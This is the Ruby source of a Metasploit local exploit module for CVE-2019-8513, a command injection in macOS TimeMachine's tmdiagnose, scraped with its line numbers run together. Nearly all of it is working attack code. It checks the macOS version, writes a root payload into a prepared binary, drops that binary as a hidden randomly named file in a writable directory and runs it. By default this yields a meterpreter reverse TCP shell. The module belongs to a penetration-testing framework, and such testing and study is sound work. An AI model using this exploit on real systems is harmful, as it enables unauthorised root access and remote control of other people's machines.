Path: blob/master/modules/exploits/osx/local/timemachine_cmd_injection.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::OSX::Priv10include Msf::Post::OSX::System11include Msf::Exploit::EXE12include Msf::Exploit::FileDropper1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',19'Description' => %q{20This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in21order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers22from a command injection vulnerability that can be exploited by creating a23specially crafted disk label.2425The tmdiagnose binary uses awk to list every mounted volume, and composes26shell commands based on the volume labels. By creating a volume label with the27backtick character, we can have our own binary executed with root priviledges.28},29'License' => MSF_LICENSE,30'Author' => [31'CodeColorist', # Discovery and exploit32'timwr', # Metasploit module33],34'References' => [35['CVE', '2019-8513'],36['URL', 'http://web.archive.org/web/20201113192302/https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],37['URL', 'https://support.apple.com/en-in/HT209600'],38['URL', 'https://github.com/ChiChou/sploits'],39],40'DefaultTarget' => 0,41'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },42'Targets' => [43[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],44[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],45[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],46],47'DisclosureDate' => '2019-04-13',48'Notes' => {49'Reliability' => UNKNOWN_RELIABILITY,50'Stability' => UNKNOWN_STABILITY,51'SideEffects' => UNKNOWN_SIDE_EFFECTS52}53)54)55register_advanced_options [56OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])57]58end5960def upload_executable_file(filepath, filedata)61print_status("Uploading file: '#{filepath}'")62write_file(filepath, filedata)63chmod(filepath)64register_file_for_cleanup(filepath)65end6667def check68version = Rex::Version.new(get_system_version)69if version >= Rex::Version.new('10.14.4')70CheckCode::Safe71else72CheckCode::Appears73end74end7576def exploit77if check != CheckCode::Appears78fail_with Failure::NotVulnerable, 'Target is not vulnerable'79end8081if is_root?82fail_with Failure::BadConfig, 'Session already has root privileges'83end8485unless writable? datastore['WritableDir']86fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"87end8889exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit"))90if target['Arch'] == ARCH_X6491root_cmd = payload.encoded92else93root_cmd = payload.raw94if target['Arch'] == ARCH_PYTHON95root_cmd = "echo \"#{root_cmd}\" | python"96end97root_cmd = "CMD:#{root_cmd}"98end99if root_cmd.length > 1024100fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"101end102103placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')104exploit_data[placeholder_index, root_cmd.length] = root_cmd105106exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"107upload_executable_file(exploit_file, exploit_data)108109print_status("Executing exploit '#{exploit_file}'")110result = cmd_exec(exploit_file)111print_status("Exploit result:\n#{result}")112end113end114115116